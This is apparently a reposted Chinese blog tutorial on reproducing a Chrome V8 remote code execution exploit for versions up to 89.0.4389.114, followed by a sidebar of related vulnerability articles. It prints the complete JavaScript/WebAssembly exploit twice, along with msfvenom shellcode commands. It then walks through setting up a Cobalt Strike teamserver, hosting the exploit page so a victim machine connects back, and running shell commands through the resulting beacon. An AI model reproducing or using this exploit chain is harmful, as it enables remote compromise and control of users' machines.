Chrome浏览器代码执行0day漏洞

最新推荐文章于 2022-09-05 19:24:36 发布
最新推荐文章于 2022-09-05 19:24:36 发布
阅读量501 收藏 2
点赞数 1
分类专栏: 网络 文章标签: chrome 安全 前端
原文链接:https://blog.csdn.net/NicolasZQ/article/details/121940527
版权

适用版本:
漏洞危害:远程代码执行
影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114)
测试版本: 86.0.4240.198

教程内容:
一、利用kali生成shellcode代码
比如说我要弹出计算器,那么:
64位操作系统:

msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num

32位操作系统:

msfvenom -a x86 -p windows/exec CMD="calc" EXITFUNC=thread -f num

把这段16进制的数复制下来,放到下面代码第七行的括号里面:

<script>
 
function gc() {
 
for (var i = 0; i < 0x80000; ++i) {
 
var a = new ArrayBuffer();
 
}
 
}
 
let shellcode = []; //生成的shellcode放入中括号内
 
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
 
var wasmModule = new WebAssembly.Module(wasmCode);
 
var wasmInstance = new WebAssembly.Instance(wasmModule);
 
var main = wasmInstance.exports.main;
 
var bf = new ArrayBuffer(8);
 
var bfView = new DataView(bf);
 
function fLow(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(0, true));
 
}
 
function fHi(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(4, true))
 
}
 
function i2f(low, hi) {
 
bfView.setUint32(0, low, true);
 
bfView.setUint32(4, hi, true);
 
return bfView.getFloat64(0, true);
 
}
 
function f2big(f) {
 
bfView.setFloat64(0, f, true);
 
return bfView.getBigUint64(0, true);
 
}
 
function big2f(b) {
 
bfView.setBigUint64(0, b, true);
 
return bfView.getFloat64(0, true);
 
}
 
class LeakArrayBuffer extends ArrayBuffer {
 
constructor(size) {
 
super(size);
 
this.slot = 0xb33f;
 
}
 
}
 
function foo(a) {
 
let x = -1;
 
if (a) x = 0xFFFFFFFF;
 
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
 
arr.shift();
 
let local_arr = Array(2);
 
local_arr[0] = 5.1;//4014666666666666
 
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
 
arr[0] = 0x1122;
 
return [arr, local_arr, buff];
 
}
 
for (var i = 0; i < 0x10000; ++i)
 
foo(false);
 
gc(); gc();
 
[corrput_arr, rwarr, corrupt_buff] = foo(true);
 
corrput_arr[12] = 0x22444;
 
delete corrput_arr;
 
function setbackingStore(hi, low) {
 
rwarr[4] = i2f(fLow(rwarr[4]), hi);
 
rwarr[5] = i2f(low, fHi(rwarr[5]));
 
}
 
function leakObjLow(o) {
 
corrupt_buff.slot = o;
 
return (fLow(rwarr[9]) - 1);
 
}
 
let corrupt_view = new DataView(corrupt_buff);
 
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
 
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
 
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
 
let delta = baseAddr + 0x1c - idx0Addr;
 
if ((delta % 8) == 0) {
 
let baseIdx = delta / 8;
 
this.base = fLow(rwarr[baseIdx]);
 
} else {
 
let baseIdx = ((delta - (delta % 8)) / 8);
 
this.base = fHi(rwarr[baseIdx]);
 
}
 
let wasmInsAddr = leakObjLow(wasmInstance);
 
setbackingStore(wasmInsAddr, this.base);
 
let code_entry = corrupt_view.getFloat64(13 * 8, true);
 
setbackingStore(fLow(code_entry), fHi(code_entry));
 
for (let i = 0; i < shellcode.length; i++) {
 
corrupt_view.setUint8(i, shellcode[i]);
 
}
 
main();
 
</script>
就像下面这样:

保存这个txt文件为exploit.html(名字无所谓,别带中文)。

此次测试需要关闭沙箱环境:
右键单击chrome浏览器的图标(我这个是修改过的),然后在目标的最后面加上

--no-sandbox file:///C:/Users/xuanjian/Desktop/exploit.html(文件路径自己改)

点击“应用”,然后打开浏览器。


看到已经执行了命令cmd='calc',弹出了一个计算器。

二、利用cobaltstrike上线
前期准备:
如果你有两台电脑可以一台当服务端一台当客户端,但是如果像我一样,只有一台电脑,那么就按照以下这些步骤来。
我是拿我的宿主机当服务端,win10虚拟机当客户端,win7虚拟机当受害人。

在win10虚拟机和宿主机上面安装好apache2,如何安装请参考Apache安装教程_Junior2018的博客-CSDN博客_apache安装。
在win10虚拟机和宿主机上都放一份cobaltstrike,下载链接:文件密码:av41
关闭win10虚拟机和win7虚拟机的防火墙,包括域防火墙。(做完1这个操作之后按照234一步步点击)


教程内容:
在宿主机上以管理员身份打开cmd窗口,一定要管理员身份,然后输入cd 你的cobaltstrike目录,比如我是
cd C:\Users\nicolas\桌面\CobaltStrike\CobaltStrike,然后输入teamserver.bat 192.168.209.1 1234,192.168.209.1指的是宿主机的IP,1234是密码,可以随便输,但是不要中文。

出现这种内容就表示成功了。

然后打开win10虚拟机,单击cobaltsrike.bat:


输入IP是192.168.209.1、端口号50050(如果没开就新建个入站规则)、密码1234

进入之后,单击左上角的耳机符号的按钮:


3.点击最底下的“add”,按照下图内容填写,然后save保存:

其中,192.168.209.1和之前的要一致,端口号任意,只要不被占用即可。

点击最上面的攻击—>生成后门—>Payload Generator


然后填入以下内容,如果监听器一格没内容,就add添加进去,记得勾选“使用x64 payload”:

然后点击generate保存到电脑里面,如下图:

记事本打开这段payload,按快捷键ctrl+H把\全部替换为,0(注意是英文的,)


然后复制双引号里面的内容,记得去掉第一个逗号,发复制的内容粘贴在下面这段代码的第七行的括号里面。

<script>
 
function gc() {
 
for (var i = 0; i < 0x80000; ++i) {
 
var a = new ArrayBuffer();
 
}
 
}
 
let shellcode = []; //生成的shellcode放入中括号内
 
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
 
var wasmModule = new WebAssembly.Module(wasmCode);
 
var wasmInstance = new WebAssembly.Instance(wasmModule);
 
var main = wasmInstance.exports.main;
 
var bf = new ArrayBuffer(8);
 
var bfView = new DataView(bf);
 
function fLow(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(0, true));
 
}
 
function fHi(f) {
 
bfView.setFloat64(0, f, true);
 
return (bfView.getUint32(4, true))
 
}
 
function i2f(low, hi) {
 
bfView.setUint32(0, low, true);
 
bfView.setUint32(4, hi, true);
 
return bfView.getFloat64(0, true);
 
}
 
function f2big(f) {
 
bfView.setFloat64(0, f, true);
 
return bfView.getBigUint64(0, true);
 
}
 
function big2f(b) {
 
bfView.setBigUint64(0, b, true);
 
return bfView.getFloat64(0, true);
 
}
 
class LeakArrayBuffer extends ArrayBuffer {
 
constructor(size) {
 
super(size);
 
this.slot = 0xb33f;
 
}
 
}
 
function foo(a) {
 
let x = -1;
 
if (a) x = 0xFFFFFFFF;
 
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
 
arr.shift();
 
let local_arr = Array(2);
 
local_arr[0] = 5.1;//4014666666666666
 
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
 
arr[0] = 0x1122;
 
return [arr, local_arr, buff];
 
}
 
for (var i = 0; i < 0x10000; ++i)
 
foo(false);
 
gc(); gc();
 
[corrput_arr, rwarr, corrupt_buff] = foo(true);
 
corrput_arr[12] = 0x22444;
 
delete corrput_arr;
 
function setbackingStore(hi, low) {
 
rwarr[4] = i2f(fLow(rwarr[4]), hi);
 
rwarr[5] = i2f(low, fHi(rwarr[5]));
 
}
 
function leakObjLow(o) {
 
corrupt_buff.slot = o;
 
return (fLow(rwarr[9]) - 1);
 
}
 
let corrupt_view = new DataView(corrupt_buff);
 
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
 
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
 
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
 
let delta = baseAddr + 0x1c - idx0Addr;
 
if ((delta % 8) == 0) {
 
let baseIdx = delta / 8;
 
this.base = fLow(rwarr[baseIdx]);
 
} else {
 
let baseIdx = ((delta - (delta % 8)) / 8);
 
this.base = fHi(rwarr[baseIdx]);
 
}
 
let wasmInsAddr = leakObjLow(wasmInstance);
 
setbackingStore(wasmInsAddr, this.base);
 
let code_entry = corrupt_view.getFloat64(13 * 8, true);
 
setbackingStore(fLow(code_entry), fHi(code_entry));
 
for (let i = 0; i < shellcode.length; i++) {
 
corrupt_view.setUint8(i, shellcode[i]);
 
}
 
main();
 
</script>
保存这段代码为exploit.html,传到apache的htdocs目录下,然后打开win7虚拟机。

右键单击chrome浏览器图标,在目标后面加上--no-sandbox,表示关闭沙箱环境,否则沙箱可以识别出,点击“应用”。


然后打开chrome,在地址栏输入192.168.209.1/exploit.html,等一会儿出现下面这个界面就对了:

回到win10虚拟机,可以看到cs里面已经上线了我们的win7虚拟机:


我们可以单击右键进入beacon:

输入shell ipconfig即可查看我们win7虚拟机的IP地址:

还可以输入其他的命令,这里不一一展开了。

教程总结:
防火墙要关完全。
其实这个漏洞挺鸡肋的,因为要关闭沙箱,正常人不会这么做,就好比问别人要账号密码一样不太现实。
是一次初学者本地练习cs上线的不错的机会。

thlzjfefe
关注
专栏目录
2021HW — Chrome 0day漏洞
战神/calmness的博客
04-13 1041
2021HW — Chrome 0day漏洞 目录 简述 漏洞环境 过程 修复建议 参考 2021HW — Chrome 0day漏洞 简述 北京时间4月13日凌晨,安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。 为了测试该漏洞,研究者关闭了浏览器Edge89.0.774.76版本和Chrome89.0.4389.114版本的沙盒 分析ht...
CVE-2021-21220 Chrome远程代码执行漏洞复现
m0_56642842的博客
06-30 2565
0x00 简介 Google Chrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。 通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。 微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以直接在电脑上接受手机微信上的任何信息,例如接收:文字、图片、语音、视频等功能。这款软件是腾讯公司为了方
Google确认Chrome存在严重漏洞,向20亿用户发出警告:你们需立即更新浏览器
小詹学python的博客
05-09 1708
作者:okay来源:扩展迷EXTFANS近日,Google面向二十亿Chrome浏览器用户推出至关重要的补丁程序,并再次强调大家需要立即更新其浏览器。如果你在Mac,Windows 10...
谷歌Chrome紧急更新补丁0day漏洞
itcarry的博客
05-24 271
Chrome 100.0.4896.127 已针对所有受支持的桌面操作系统(Windows、Mac 和 Linux)发布,以解决该问题。更新将像往常一样随着时间的推移推出,但 Chrome 用户可以通过以下方式加快安装速度:
谷歌再修复已遭利用的两个高危 Chrome 0day
smellycat000的专栏
11-12 328
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今天,谷歌发布 Chrome 版本 86.0.4240.198,修复了两个已遭利用的 0day。不过这次并不像之前那样由谷歌...
Chrome爆高危远程代码执行漏洞,赶紧更新!
blackorbird的博客
03-07 397
漏洞出现问题的地方在于一个APIFileReader是一个标准的API,旨在允许web应用程序异步读取存储在用户计算机上文件(或原始数据缓冲区)的内容,通过‘Fi...
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 (附poc)
gjgj的博客
04-21 7529
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 一、基本信息 CVE编号:CNVD-2021-27989 危险等级:严重 漏洞类型:远程代码执行漏洞 漏洞影响范围:Google Chrome < = 89.0.4389.114。 利用条件:Chrome: <=89.0.4389.114,开启--no-sandbox 无沙盒模式 二、漏洞描述 攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Chr...
Chrome浏览器解优化过程中的漏洞安全研究.pdf
12-14
Chrome浏览器作为当前市场占比最高的浏览器,是最为广泛的互联网入口,饱受APT攻击、0day漏洞的困扰。V8引擎占比大于50%,优化漏洞由于数量多、品相好、可利用性高等特点,在V8引擎漏洞中占比很大,也是攻击者挖掘的...
Chrome 远程代码执行0Day-----复现
qq_36448110的博客
05-06 229
之前护网就听说有个pc微信的0day漏洞,当时赶紧交客户把pc版的微信更新了。 现在复现这个chrome漏洞,就是同样的原理。(因为微信的浏览器也是谷歌的内核,而且比较老,默认关闭沙箱) 漏洞前提条件: 1.chrome://version <=89.0.4389.114 2.浏览器 -no-sandbox 关闭沙箱 复现过程: 1.下载poc :https://github.com/r4j0x00/exploits/tree/master/chrome-0day 2.关闭沙箱 两种方式,方式一:
手把手教你详细分析 Chrome 1day 漏洞 (CVE-2021-21224)
smellycat000的专栏
04-23 2857
聚焦源代码安全,网罗国内外最新资讯!本文共分五部分:一、时间线二、背景三、漏洞及补丁分析1、漏洞复现四、漏洞利用分析1、漏洞利用2、内存读写3、代码执行五、参考资料一、时间线2021年4...
【复现】Chrome三天内的第二枚0Day(结合其他漏洞可绕沙箱)
爱国小白帽
04-15 1921
漏洞描述 Google Chrome是由Google开发的免费网页浏览器。经测试,此漏洞影响 Chrome 最新正式版(89.0.4389.128)以及基于Chromium内核的Microsoft Edge正式版(89.0.774.76)。攻击者可通过构造特制web页面并诱导受害者访问来利用此漏洞获得远程代码执行。 影响范围 Google Chrome <= 89.0.4389.128 基于Chromium内核的Microsoft Edge <= 89.0.774.76 其他基于V8引擎的浏览.
Chrome 0day【复现】
qq_45300786的博客
04-21 329
开始 最近爆出了通过微信链接,执行RCE。今天就来试试。 原理 微信默认Chrome内核并且关闭了安全沙箱 环境: 1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox exp1是打开一个记事本 exp2是打开一个计算器 参考文章 Google Chrome 0day 远程代码执行漏洞复现 解决微信0day
谷歌Chrome紧急修复已遭利用0day
smellycat000的专栏
09-05 297
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士谷歌发布适用于Windows、Mac和Linux 用户的Chrome 105.0.5195.102 版本,修复已遭利用的高危漏洞 (CVE-2022-3075),它是今年以来谷歌修复的第六个已遭利用的0day。谷歌在上周五发布安全公告指出,“谷歌发现CVE-2022-3075的exploit已在野。”该新版本在桌面稳定版频道推出,谷歌表示将在数天...
Windows Chrome 0day复现-2021.04.13更新
crowsec
02-10 790
2021.04.13更新——近日Windows Chrome 0day爆出0day漏洞,目前对所有普通用户的Windows Chrome浏览器均有效,但是利用比较鸡肋
Chrome浏览器远程代码执行0Day漏洞风险通告——POC已公开
MachineGunJoe666
04-13 450
国外安全研究员发布了Chrome浏览器远程代码执行 0Day漏洞的POC详情,漏洞为“严重”级别,攻击者可以利用漏洞构造特别的页面,访问该页面会造成远程代码执行。 1漏洞描述 国外安全研究员发布了Chrome远程代码执行 0Day漏洞的POC详情,漏洞为“严重”级别。攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。 该0day漏...
漏洞复现】最新Chrome远程代码执行0 Day
在下小黄的博客
04-13 2008
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: 【复现】最新Chrome远程代码执行 0 Day 往期检索:程序设计学习笔记——目录 创建时间:2021年4月13日 软件: Chrome( 89.0.4389.114)及以下正式版仍存在该漏洞Chrome远程代码执行0 Day漏洞简述: 漏洞简述: 2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情, 漏洞等级:严重 漏洞评分:9.
chrome 最新0day复现
weixin_44024162的博客
04-16 688
Chrome 0day 远程代码执行漏洞复现 1.测试环境 浏览器版本 90.0.4430.72 操作系统 windows 7 2. 利用条件:关闭沙箱 3. 利用过程 打开chrome属性 在目标输入框最后添加 –no-sandbox 点击应用 4. 使用 chrome 打开 准备好的poc,弹出记事本 exp 链接 4. 预防措施 开启沙箱模式,不要关闭沙箱模式。 可以使用 firefox 浏览器等非V8引擎的浏览器。 ...
谷歌修复已遭利用的 Chrome 0day
smellycat000的专栏
02-05 1188
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌修复了 Chrome 88.0.4324.150版本中一个已遭利用的 0day 漏洞,影响 Windows、Mac 和 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值